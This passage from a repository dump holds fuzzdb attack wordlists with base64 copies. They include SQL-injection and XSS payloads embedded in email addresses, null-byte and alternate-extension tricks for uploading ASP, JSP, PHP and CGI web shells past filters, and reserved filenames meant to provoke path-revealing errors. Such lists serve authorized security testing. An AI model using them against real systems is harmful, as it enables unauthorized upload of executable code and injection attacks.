22 | sql'or'1'='1'or'test@email.com
23 | xss"><"test@address.com
24 | a"b(c)d,e:f;gi[j\k]l@example.com
25 | this is"not\allowed@example.com
26 | notallowed@example.com
27 | notallowed@example.com
28 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/email/invalid-email-addresses.txt.base64:
--------------------------------------------------------------------------------
1 | anVzdGFzdHJpbmcNCmVtYWlsQGFkZHJlc2UuY29tO3NlY29uZGVtYWlsQGFkZHJlc3MuY29tDQpAYWRkcmVzcy5jb20NCkphY2NvIFZhbiBUdWlqbCA8ZW1haWxAZXhhbXBsZS5jb20+DQplbWFpbC5hZGRyZXNzLmNvbQ0KZW1haWxAYWRkcmVzc0BleGFtcGxlLmNvbQ0KI0AlXiUjJEAjJEAjLmNvbQ0KLmVtYWlsQGFkZHJlc3MuY29tDQrDo8KB4oCgw6PCgcuGw6PCgeKAmsOjwoHigJ7Do8KBxaBAYWRkcmVzcy5jb20NCmVtYWlsLkBhZGRyZXNzLmNvbQ0KZW1haWwuLmVtYWlsQGFkZHJlc3MuY29tDQplbWFpbEBhZGRyZXNzLi5jb20NCmVtYWlsQGFkZHJlc3MuY29tIChKYWNjbyB2YW4gVHVpamwpDQplbWFpbEAtYWRkcmVzcy5jb20NCmVtYWlsQDExMS4yMjIuMzMzLjQ0NDQ0DQpBYmMuLjEyM0BhZGRyZXNzLmNvbQ0Kw6LigqzFkygpLDo7PD5bXF1AYWRkcmVzcy5jb20NCmphY2NvInZhbiJ0dWlqbEBhZGRyZXNzLmNvbQ0KamFjY29cIHZhbiJzb21ldGluZyJ0dWlqbFxleGFtcGxlQGFkZHJlc3MuY29tDQrDouKCrMWTZW1haWzDouKCrMKdQGFkZHJlc3MuY29tDQpzcWwib3IiMSI9IjEib3IidGVzdEBlbWFpbC5jb20NCnNxbCdvcicxJz0nMSdvcid0ZXN0QGVtYWlsLmNvbQ0KeHNzIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+PCJ0ZXN0QGFkZHJlc3MuY29tDQphImIoYylkLGU6ZjtnPGg+aVtqXGtdbEBleGFtcGxlLmNvbQ0KdGhpcyBpcyJub3RcYWxsb3dlZEBleGFtcGxlLmNvbQ0Kbm90YWxsb3dlZEBleGFtcGxlLmNvbSANCiBub3RhbGxvd2VkQGV4YW1wbGUuY29tDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-asp.txt:
--------------------------------------------------------------------------------
1 | asp
2 | aspx
3 | asa
4 | aSP
5 | aSpx
6 | aSa
7 | asp%20%20%20
8 | aspx%20%20%20
9 | asa%20%20%20
10 | aSP%20%20%20
11 | aSpx%20%20%20
12 | aSa%20%20%20
13 | asp......
14 | aspx......
15 | asa......
16 | aSP......
17 | aSpx......
18 | aSa......
19 | asp%20%20%20...%20.%20..
20 | aspx%20%20%20...%20.%20..
21 | asa%20%20%20...%20.%20..
22 | aSP%20%20%20...%20.%20..
23 | aSpx%20%20%20...%20.%20..
24 | aSa%20%20%20...%20.%20..
25 | asp%00
26 | aspx%00
27 | asa%00
28 | aSp%00
29 | aSpx%00
30 | aSa%00
31 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-asp.txt.base64:
--------------------------------------------------------------------------------
1 | YXNwDQphc3B4DQphc2ENCmFTUA0KYVNweA0KYVNhDQphc3AlMjAlMjAlMjANCmFzcHglMjAlMjAlMjANCmFzYSUyMCUyMCUyMA0KYVNQJTIwJTIwJTIwDQphU3B4JTIwJTIwJTIwDQphU2ElMjAlMjAlMjANCmFzcC4uLi4uLg0KYXNweC4uLi4uLg0KYXNhLi4uLi4uDQphU1AuLi4uLi4NCmFTcHguLi4uLi4NCmFTYS4uLi4uLg0KYXNwJTIwJTIwJTIwLi4uJTIwLiUyMC4uDQphc3B4JTIwJTIwJTIwLi4uJTIwLiUyMC4uDQphc2ElMjAlMjAlMjAuLi4lMjAuJTIwLi4NCmFTUCUyMCUyMCUyMC4uLiUyMC4lMjAuLg0KYVNweCUyMCUyMCUyMC4uLiUyMC4lMjAuLg0KYVNhJTIwJTIwJTIwLi4uJTIwLiUyMC4uDQphc3AlMDANCmFzcHglMDANCmFzYSUwMA0KYVNwJTAwDQphU3B4JTAwDQphU2ElMDANCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-coldfusion.txt:
--------------------------------------------------------------------------------
1 | cfm
2 | cfml
3 | cfc
4 | dbm
5 | cFm
6 | cFml
7 | cFc
8 | dBm
9 | cfm%20%20%20
10 | cfml%20%20%20
11 | cfc%20%20%20
12 | dbm%20%20%20
13 | cFm%20%20%20
14 | cFml%20%20%20
15 | cFc%20%20%20
16 | dBm%20%20%20
17 | cfm......
18 | cfml......
19 | cfc.......
20 | dbm......
21 | cFm......
22 | cFml......
23 | cFc......
24 | dBm......
25 | cfm%20%20%20...%20.%20..
26 | cfml%20%20%20...%20.%20..
27 | cfc%20%20%20...%20.%20..
28 | dbm%20%20%20...%20.%20..
29 | cFm%20%20%20...%20.%20..
30 | cFml%20%20%20...%20.%20..
31 | cFc%20%20%20...%20.%20..
32 | dBm%20%20%20...%20.%20..
33 | cfm%00
34 | cfml%00
35 | cfc%00
36 | dbm%00
37 | cFm%00
38 | cFml%00
39 | cFc%00
40 | dBm%00
41 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-coldfusion.txt.base64:
--------------------------------------------------------------------------------
1 | Y2ZtDQpjZm1sDQpjZmMNCmRibQ0KY0ZtDQpjRm1sDQpjRmMNCmRCbQ0KY2ZtJTIwJTIwJTIwDQpjZm1sJTIwJTIwJTIwDQpjZmMlMjAlMjAlMjANCmRibSUyMCUyMCUyMA0KY0ZtJTIwJTIwJTIwDQpjRm1sJTIwJTIwJTIwDQpjRmMlMjAlMjAlMjANCmRCbSUyMCUyMCUyMA0KY2ZtLi4uLi4uDQpjZm1sLi4uLi4uDQpjZmMuLi4uLi4uDQpkYm0uLi4uLi4NCmNGbS4uLi4uLg0KY0ZtbC4uLi4uLg0KY0ZjLi4uLi4uDQpkQm0uLi4uLi4NCmNmbSUyMCUyMCUyMC4uLiUyMC4lMjAuLg0KY2ZtbCUyMCUyMCUyMC4uLiUyMC4lMjAuLg0KY2ZjJTIwJTIwJTIwLi4uJTIwLiUyMC4uDQpkYm0lMjAlMjAlMjAuLi4lMjAuJTIwLi4NCmNGbSUyMCUyMCUyMC4uLiUyMC4lMjAuLg0KY0ZtbCUyMCUyMCUyMC4uLiUyMC4lMjAuLg0KY0ZjJTIwJTIwJTIwLi4uJTIwLiUyMC4uDQpkQm0lMjAlMjAlMjAuLi4lMjAuJTIwLi4NCmNmbSUwMA0KY2ZtbCUwMA0KY2ZjJTAwDQpkYm0lMDANCmNGbSUwMA0KY0ZtbCUwMA0KY0ZjJTAwDQpkQm0lMDANCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-jsp.txt:
--------------------------------------------------------------------------------
1 | jsp
2 | jspx
3 | jsw
4 | jsv
5 | jspf
6 | jSp
7 | jSpx
8 | jSw
9 | jSv
10 | jSpf
11 | jSp%00
12 | jSp%20%20%20
13 | jSp%20%20%20...%20.%20..a
14 | jSp......
15 | jSpf%00
16 | jSpf%20%20%20
17 | jSpf%20%20%20...%20.%20..a
18 | jSpf......
19 | jSpx%00
20 | jSpx%20%20%20
21 | jSpx%20%20%20...%20.%20..a
22 | jSpx......
23 | jSv%00
24 | jSv%20%20%20
25 | jSv%20%20%20...%20.%20..a
26 | jSv......
27 | jSw%00
28 | jSw%20%20%20
29 | jSw%20%20%20...%20.%20..a
30 | jSw......
31 | jsp%00
32 | jsp%20%20%20
33 | jsp%20%20%20...%20.%20..a
34 | jsp......
35 | jspf%00
36 | jspf%20%20%20
37 | jspf%20%20%20...%20.%20..a
38 | jspf......
39 | jspx%00
40 | jspx%20%20%20
41 | jspx%20%20%20...%20.%20..a
42 | jspx......
43 | jsv%00
44 | jsv%20%20%20
45 | jsv%20%20%20...%20.%20..a
46 | jsv......
47 | jsw%00
48 | jsw%20%20%20
49 | jsw%20%20%20...%20.%20..a
50 | jsw......
51 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-jsp.txt.base64:
--------------------------------------------------------------------------------
1 | anNwDQpqc3B4DQpqc3cNCmpzdg0KanNwZg0KalNwDQpqU3B4DQpqU3cNCmpTdg0KalNwZg0KalNwJTAwDQpqU3AlMjAlMjAlMjANCmpTcCUyMCUyMCUyMC4uLiUyMC4lMjAuLmENCmpTcC4uLi4uLg0KalNwZiUwMA0KalNwZiUyMCUyMCUyMA0KalNwZiUyMCUyMCUyMC4uLiUyMC4lMjAuLmENCmpTcGYuLi4uLi4NCmpTcHglMDANCmpTcHglMjAlMjAlMjANCmpTcHglMjAlMjAlMjAuLi4lMjAuJTIwLi5hDQpqU3B4Li4uLi4uDQpqU3YlMDANCmpTdiUyMCUyMCUyMA0KalN2JTIwJTIwJTIwLi4uJTIwLiUyMC4uYQ0KalN2Li4uLi4uDQpqU3clMDANCmpTdyUyMCUyMCUyMA0KalN3JTIwJTIwJTIwLi4uJTIwLiUyMC4uYQ0KalN3Li4uLi4uDQpqc3AlMDANCmpzcCUyMCUyMCUyMA0KanNwJTIwJTIwJTIwLi4uJTIwLiUyMC4uYQ0KanNwLi4uLi4uDQpqc3BmJTAwDQpqc3BmJTIwJTIwJTIwDQpqc3BmJTIwJTIwJTIwLi4uJTIwLiUyMC4uYQ0KanNwZi4uLi4uLg0KanNweCUwMA0KanNweCUyMCUyMCUyMA0KanNweCUyMCUyMCUyMC4uLiUyMC4lMjAuLmENCmpzcHguLi4uLi4NCmpzdiUwMA0KanN2JTIwJTIwJTIwDQpqc3YlMjAlMjAlMjAuLi4lMjAuJTIwLi5hDQpqc3YuLi4uLi4NCmpzdyUwMA0KanN3JTIwJTIwJTIwDQpqc3clMjAlMjAlMjAuLi4lMjAuJTIwLi5hDQpqc3cuLi4uLi4NCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-perl.txt:
--------------------------------------------------------------------------------
1 | # .pm .lib cannot be called directly, must be called as modules
2 | pl
3 | pm
4 | cgi
5 | pL
6 | pM
7 | cGi
8 | lib
9 | lIb
10 | cGi%00
11 | cGi%20%20%20
12 | cGi......
13 | cgi%00
14 | cgi%20%20%20
15 | cgi......
16 | lIb%00
17 | lIb%20%20%20
18 | lIb......
19 | lib%00
20 | lib%20%20%20
21 | lib......
22 | pL%00
23 | pL%20%20%20
24 | pL......
25 | pM%00
26 | pM%20%20%20
27 | pM......
28 | pl%00
29 | pl%20%20%20
30 | pl......
31 | pm%00
32 | pm%20%20%20
33 | pm......
34 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-perl.txt.base64:
--------------------------------------------------------------------------------
1 | IyAucG0gLmxpYiBjYW5ub3QgYmUgY2FsbGVkIGRpcmVjdGx5LCBtdXN0IGJlIGNhbGxlZCBhcyBtb2R1bGVzDQpwbA0KcG0NCmNnaQ0KcEwNCnBNDQpjR2kNCmxpYg0KbEliDQpjR2klMDANCmNHaSUyMCUyMCUyMA0KY0dpLi4uLi4uDQpjZ2klMDANCmNnaSUyMCUyMCUyMA0KY2dpLi4uLi4uDQpsSWIlMDANCmxJYiUyMCUyMCUyMA0KbEliLi4uLi4uDQpsaWIlMDANCmxpYiUyMCUyMCUyMA0KbGliLi4uLi4uDQpwTCUwMA0KcEwlMjAlMjAlMjANCnBMLi4uLi4uDQpwTSUwMA0KcE0lMjAlMjAlMjANCnBNLi4uLi4uDQpwbCUwMA0KcGwlMjAlMjAlMjANCnBsLi4uLi4uDQpwbSUwMA0KcG0lMjAlMjAlMjANCnBtLi4uLi4uDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-php.txt:
--------------------------------------------------------------------------------
1 | phtml
2 | php
3 | php3
4 | php4
5 | php5
6 | inc
7 | pHtml
8 | pHp
9 | pHp3
10 | pHp4
11 | pHp5
12 | iNc
13 | iNc%00
14 | iNc%20%20%20
15 | iNc%20%20%20...%20.%20..
16 | iNc......
17 | inc%00
18 | inc%20%20%20
19 | inc%20%20%20...%20.%20..
20 | inc......
21 | pHp%00
22 | pHp%20%20%20
23 | pHp%20%20%20...%20.%20..
24 | pHp......
25 | pHp3%00
26 | pHp3%20%20%20
27 | pHp3%20%20%20...%20.%20..
28 | pHp3......
29 | pHp4%00
30 | pHp4%20%20%20
31 | pHp4%20%20%20...%20.%20..
32 | pHp4......
33 | pHp5%00
34 | pHp5%20%20%20
35 | pHp5%20%20%20...%20.%20..
36 | pHp5......
37 | pHtml%00
38 | pHtml%20%20%20
39 | pHtml%20%20%20...%20.%20..
40 | pHtml......
41 | php%00
42 | php%20%20%20
43 | php%20%20%20...%20.%20..
44 | php......
45 | php3%00
46 | php3%20%20%20
47 | php3%20%20%20...%20.%20..
48 | php3......
49 | php4%00
50 | php4%20%20%20
51 | php4%20%20%20...%20.%20..
52 | php4......
53 | php5%00
54 | php5%20%20%20
55 | php5%20%20%20...%20.%20..
56 | php5......
57 | phtml%00
58 | phtml%20%20%20
59 | phtml%20%20%20...%20.%20..
60 | phtml......
61 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/alt-extensions-php.txt.base64:
--------------------------------------------------------------------------------
1 | cGh0bWwNCnBocA0KcGhwMw0KcGhwNA0KcGhwNQ0KaW5jICANCnBIdG1sDQpwSHANCnBIcDMNCnBIcDQNCnBIcDUNCmlOYw0KaU5jJTAwDQppTmMlMjAlMjAlMjANCmlOYyUyMCUyMCUyMC4uLiUyMC4lMjAuLg0KaU5jLi4uLi4uDQppbmMlMDANCmluYyUyMCUyMCUyMA0KaW5jJTIwJTIwJTIwLi4uJTIwLiUyMC4uDQppbmMuLi4uLi4NCnBIcCUwMA0KcEhwJTIwJTIwJTIwDQpwSHAlMjAlMjAlMjAuLi4lMjAuJTIwLi4NCnBIcC4uLi4uLg0KcEhwMyUwMA0KcEhwMyUyMCUyMCUyMA0KcEhwMyUyMCUyMCUyMC4uLiUyMC4lMjAuLg0KcEhwMy4uLi4uLg0KcEhwNCUwMA0KcEhwNCUyMCUyMCUyMA0KcEhwNCUyMCUyMCUyMC4uLiUyMC4lMjAuLg0KcEhwNC4uLi4uLg0KcEhwNSUwMA0KcEhwNSUyMCUyMCUyMA0KcEhwNSUyMCUyMCUyMC4uLiUyMC4lMjAuLg0KcEhwNS4uLi4uLg0KcEh0bWwlMDANCnBIdG1sJTIwJTIwJTIwDQpwSHRtbCUyMCUyMCUyMC4uLiUyMC4lMjAuLg0KcEh0bWwuLi4uLi4NCnBocCUwMA0KcGhwJTIwJTIwJTIwDQpwaHAlMjAlMjAlMjAuLi4lMjAuJTIwLi4NCnBocC4uLi4uLg0KcGhwMyUwMA0KcGhwMyUyMCUyMCUyMA0KcGhwMyUyMCUyMCUyMC4uLiUyMC4lMjAuLg0KcGhwMy4uLi4uLg0KcGhwNCUwMA0KcGhwNCUyMCUyMCUyMA0KcGhwNCUyMCUyMCUyMC4uLiUyMC4lMjAuLg0KcGhwNC4uLi4uLg0KcGhwNSUwMA0KcGhwNSUyMCUyMCUyMA0KcGhwNSUyMCUyMCUyMC4uLiUyMC4lMjAuLg0KcGhwNS4uLi4uLg0KcGh0bWwlMDANCnBodG1sJTIwJTIwJTIwDQpwaHRtbCUyMCUyMCUyMC4uLiUyMC4lMjAuLg0KcGh0bWwuLi4uLi4NCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt:
--------------------------------------------------------------------------------
1 | templates_compiled
2 | templates_c
3 | templates
4 | temporary
5 | images
6 | cache
7 | temp
8 | files
9 | tmp
10 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt.base64:
--------------------------------------------------------------------------------
1 | dGVtcGxhdGVzX2NvbXBpbGVkDQp0ZW1wbGF0ZXNfYw0KdGVtcGxhdGVzDQp0ZW1wb3JhcnkNCmltYWdlcw0KY2FjaGUNCnRlbXANCmZpbGVzDQp0bXANCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt:
--------------------------------------------------------------------------------
1 | {ASPSCRIPT}
2 | {ASPSCRIPT}.{EXT}
3 | {ASPSCRIPT};
4 | {ASPSCRIPT};.{EXT}
5 | {ASPSCRIPT}%00
6 | {ASPSCRIPT}%00.{EXT}
7 | {ASPSCRIPT}::data%00.
8 | {ASPSCRIPT}::data%00.{EXT}
9 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt.base64:
--------------------------------------------------------------------------------
1 | e0FTUFNDUklQVH0NCntBU1BTQ1JJUFR9LntFWFR9DQp7QVNQU0NSSVBUfTsNCntBU1BTQ1JJUFR9Oy57RVhUfQ0Ke0FTUFNDUklQVH0lMDANCntBU1BTQ1JJUFR9JTAwLntFWFR9DQp7QVNQU0NSSVBUfTo6ZGF0YSUwMC4NCntBU1BTQ1JJUFR9OjpkYXRhJTAwLntFWFR9DQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-ms-php.txt:
--------------------------------------------------------------------------------
1 | {PHPSCRIPT}
2 | {PHPSCRIPT}.phtml
3 | {PHPSCRIPT}.php.html
4 | {PHPSCRIPT}.php::$DATA
5 | {PHPSCRIPT}.php.php.rar
6 | {PHPSCRIPT}.php.rar
7 | {PHPSCRIPT}::$DATA
8 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-ms-php.txt.base64:
--------------------------------------------------------------------------------
1 | e1BIUFNDUklQVH0NCntQSFBTQ1JJUFR9LnBodG1sDQp7UEhQU0NSSVBUfS5waHAuaHRtbA0Ke1BIUFNDUklQVH0ucGhwOjokREFUQQ0Ke1BIUFNDUklQVH0ucGhwLnBocC5yYXIgDQp7UEhQU0NSSVBUfS5waHAucmFyIA0Ke1BIUFNDUklQVH06OiREQVRBDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt:
--------------------------------------------------------------------------------
1 | %00index.html
2 | ;index.html
3 | %00
4 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt.base64:
--------------------------------------------------------------------------------
1 | JTAwaW5kZXguaHRtbA0KO2luZGV4Lmh0bWwNCiUwMCAgDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-x-platform-php.txt:
--------------------------------------------------------------------------------
1 | {PHPSCRIPT}
2 | {PHPSCRIPT}.phtml
3 | {PHPSCRIPT}.php.html
4 | {PHPSCRIPT}.php.php.rar
5 | {PHPSCRIPT}.php.rar
6 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/file-ul-filter-bypass-x-platform-php.txt.base64:
--------------------------------------------------------------------------------
1 | e1BIUFNDUklQVH0NCntQSFBTQ1JJUFR9LnBodG1sDQp7UEhQU0NSSVBUfS5waHAuaHRtbA0Ke1BIUFNDUklQVH0ucGhwLnBocC5yYXIgDQp7UEhQU0NSSVBUfS5waHAucmFyIA0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/invalid-filenames-linux.txt:
--------------------------------------------------------------------------------
1 | /
2 |
3 | \0
4 | /dev/null
5 | /dev/null/foo
6 | .
7 | ..
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/invalid-filenames-linux.txt.base64:
--------------------------------------------------------------------------------
1 | Lw0KDQpcMA0KL2Rldi9udWxsDQovZGV2L251bGwvZm9vDQouDQouLg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/invalid-filenames-microsoft.txt:
--------------------------------------------------------------------------------
1 | A:
2 | ZZ:
3 | CON
4 | PRN
5 | AUX
6 | CLOCK$
7 | NUL
8 | COM1
9 | COM2
10 | COM3
11 | COM4
12 | COM5
13 | COM6
14 | COM7
15 | COM8
16 | COM9
17 | LPT1
18 | LPT2
19 | LPT3
20 | LPT4
21 | LPT5
22 | LPT6
23 | LPT7
24 | LPT8
25 | LPT9
26 | *
27 | "
28 | [
29 | ]
30 | :
31 | |
32 | =
33 | ,
34 | CON.{EXT}
35 | PRN.{EXT}
36 | AUX.{EXT}
37 | CLOCK$.{EXT}
38 | NUL.{EXT}
39 | COM1.{EXT}
40 | COM2.{EXT}
41 | COM3.{EXT}
42 | COM4.{EXT}
43 | COM5.{EXT}
44 | COM6.{EXT}
45 | COM7.{EXT}
46 | COM8.{EXT}
47 | COM9.{EXT}
48 | LPT1.{EXT}
49 | LPT2.{EXT}
50 | LPT3.{EXT}
51 | LPT4.{EXT}
52 | LPT5.{EXT}
53 | LPT6.{EXT}
54 | LPT7.{EXT}
55 | LPT8.{EXT}
56 | LPT9.{EXT}
57 | *.{EXT}
58 | ".{EXT}
59 | [.{EXT}
60 | ].{EXT}
61 | :.{EXT}
62 | |.{EXT}
63 | =.{EXT}
64 | ,.{EXT}
65 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/invalid-filenames-microsoft.txt.base64:
--------------------------------------------------------------------------------
1 | QToNClpaOg0KQ09ODQpQUk4NCkFVWA0KQ0xPQ0skDQpOVUwNCkNPTTENCkNPTTINCkNPTTMNCkNPTTQNCkNPTTUNCkNPTTYNCkNPTTcNCkNPTTgNCkNPTTkNCkxQVDENCkxQVDINCkxQVDMNCkxQVDQNCkxQVDUNCkxQVDYNCkxQVDcNCkxQVDgNCkxQVDkNCioNCiINClsNCl0gDQo6IA0KfCANCj0gDQosDQpDT04ue0VYVH0NClBSTi57RVhUfQ0KQVVYLntFWFR9DQpDTE9DSyQue0VYVH0NCk5VTC57RVhUfQ0KQ09NMS57RVhUfQ0KQ09NMi57RVhUfQ0KQ09NMy57RVhUfQ0KQ09NNC57RVhUfQ0KQ09NNS57RVhUfQ0KQ09NNi57RVhUfQ0KQ09NNy57RVhUfQ0KQ09NOC57RVhUfQ0KQ09NOS57RVhUfQ0KTFBUMS57RVhUfQ0KTFBUMi57RVhUfQ0KTFBUMy57RVhUfQ0KTFBUNC57RVhUfQ0KTFBUNS57RVhUfQ0KTFBUNi57RVhUfQ0KTFBUNy57RVhUfQ0KTFBUOC57RVhUfQ0KTFBUOS57RVhUfQ0KKi57RVhUfQ0KIi57RVhUfQ0KWy57RVhUfQ0KXS57RVhUfSANCjoue0VYVH0gDQp8LntFWFR9IA0KPS57RVhUfSANCiwue0VYVH0NCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/invalid-filesystem-chars-microsoft.txt:
--------------------------------------------------------------------------------
1 | *
2 | .
3 | "
4 | /
5 | \
6 | [
7 | ]
8 | :
9 | ;
10 | |
11 | =
12 | ,
13 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/invalid-filesystem-chars-microsoft.txt.base64:
--------------------------------------------------------------------------------
1 | KiANCi4gDQoiIA0KLyANClwgDQpbIA0KXSANCjogDQo7IA0KfCANCj0gDQosDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/invalid-filesystem-chars-osx.txt:
--------------------------------------------------------------------------------
1 | # list of invalid characters for osx - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
2 | # fuzz these into a filename during upload attempts
3 | :
4 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/invalid-filesystem-chars-osx.txt.base64:
--------------------------------------------------------------------------------
1 | IyBsaXN0IG9mIGludmFsaWQgY2hhcmFjdGVycyBmb3Igb3N4IC0gdGhlc2UgY2FuIGJlIHVzZWQgdG8gYXR0ZW1wdCB0byBjYXVzZSBhbiBlcnJvciBjb25kaXRpb24gZHVyaW5nIGZpbGUgdXBsb2FkIGJ5cGFzcyBhdHRlbXB0cyB3aGljaCBtaWdodCByZXZlYWwgYW4gYWJzb2x1dGUgcGF0aC4gVXNlZnVsIGlmIHlvdSdyZSBub3Qgc3VyZSB3aGVyZSB5b3VyIGZpbGVzIGFyZSBsYW5kaW5nLg0KIyBmdXp6IHRoZXNlIGludG8gYSBmaWxlbmFtZSBkdXJpbmcgdXBsb2FkIGF0dGVtcHRzDQo6IA0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/POC_img_phpinfo-CR.gif:
--------------------------------------------------------------------------------
1 | GIF89a1
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/POC_img_phpinfo-LF-CR.gif:
--------------------------------------------------------------------------------
1 | GIF89a1
2 |
3 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/POC_phpinfo-metadata.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/queen-of-code/DotnetModelFuzzing/b67a47f8b5e50f5d49f02fe5f9ab2b3253ecc38c/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/POC_phpinfo-metadata.gif
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/POC_phpinfo-metadata.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/queen-of-code/DotnetModelFuzzing/b67a47f8b5e50f5d49f02fe5f9ab2b3253ecc38c/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/POC_phpinfo-metadata.jpg
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/lottapixel.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/queen-of-code/DotnetModelFuzzing/b67a47f8b5e50f5d49f02fe5f9ab2b3253ecc38c/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/lottapixel.jpg
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/uber.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/queen-of-code/DotnetModelFuzzing/b67a47f8b5e50f5d49f02fe5f9ab2b3253ecc38c/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/uber.gif
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/xssproject.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/queen-of-code/DotnetModelFuzzing/b67a47f8b5e50f5d49f02fe5f9ab2b3253ecc38c/Manipulations/Manipulations/fuzzdb/attack/file-upload/malicious-images/xssproject.swf
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/html_js_fuzz/html_tags.txt.base64:
--------------------------------------------------------------------------------
1 | IS0tIC0tDQohRE9DVFlQRQ0KYQ0KYWJicg0KYWNyb255bQ0KYWRkcmVzcw0KYXBwbGV0DQphcmVhDQphcnRpY2xlDQphc2lkZQ0KYXVkaW8NCmINCmJhc2UNCmJhc2Vmb250DQpiZGkNCmJkbw0KYmlnDQpibG9ja3F1b3RlDQpib2R5DQpicg0KYnV0dG9uDQpjYW52YXMNCmNhcHRpb24NCmNlbnRlcg0KY2l0ZQ0KY29kZQ0KY29sDQpjb2xncm91cA0KZGF0YWxpc3QNCmRkDQpkZWwNCmRldGFpbHMNCmRmbg0KZGlhbG9nDQpkaXINCmRpdg0KZGwNCmR0DQplbQ0KZW1iZWQNCmZpZWxkc2V0DQpmaWdjYXB0aW9uDQpmaWd1cmUNCmZvbnQNCmZvb3Rlcg0KZm9ybQ0KZnJhbWUNCmZyYW1lc2V0DQpoMQ0KaDINCmgzDQpoNA0KaDUNCmg2DQpoZWFkDQpoZWFkZXINCmhyDQpodG1sDQppDQppZnJhbWUNCmltZw0KaW5wdXQNCmlucw0Ka2JkDQprZXlnZW4NCmxhYmVsDQpsZWdlbmQNCmxpDQpsaW5rDQptYWluDQptYXANCm1hcmsNCm1lbnUNCm1lbnVpdGVtDQptZXRhDQptZXRlcg0KbmF2DQpub2ZyYW1lcw0Kbm9zY3JpcHQNCm9iamVjdA0Kb2wNCm9wdGdyb3VwDQpvcHRpb24NCm91dHB1dA0KcA0KcGFyYW0NCnByZQ0KcHJvZ3Jlc3MNCnENCnJwDQpydA0KcnVieQ0Kcw0Kc2FtcA0Kc2NyaXB0DQpzZWN0aW9uDQpzZWxlY3QNCnNtYWxsDQpzb3VyY2UNCnNwYW4NCnN0cmlrZQ0Kc3Ryb25nDQpzdHlsZQ0Kc3ViDQpzdW1tYXJ5DQpzdXANCnRhYmxlDQp0Ym9keQ0KdGQNCnRleHRhcmVhDQp0Zm9vdA0KdGgNCnRoZWFkDQp0aW1lDQp0aXRsZQ0KdHINCnRyYWNrDQp0dA0KdQ0KdWwNCnZhcg0KdmlkZW8NCndicg0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/html_js_fuzz/javascript_events.txt:
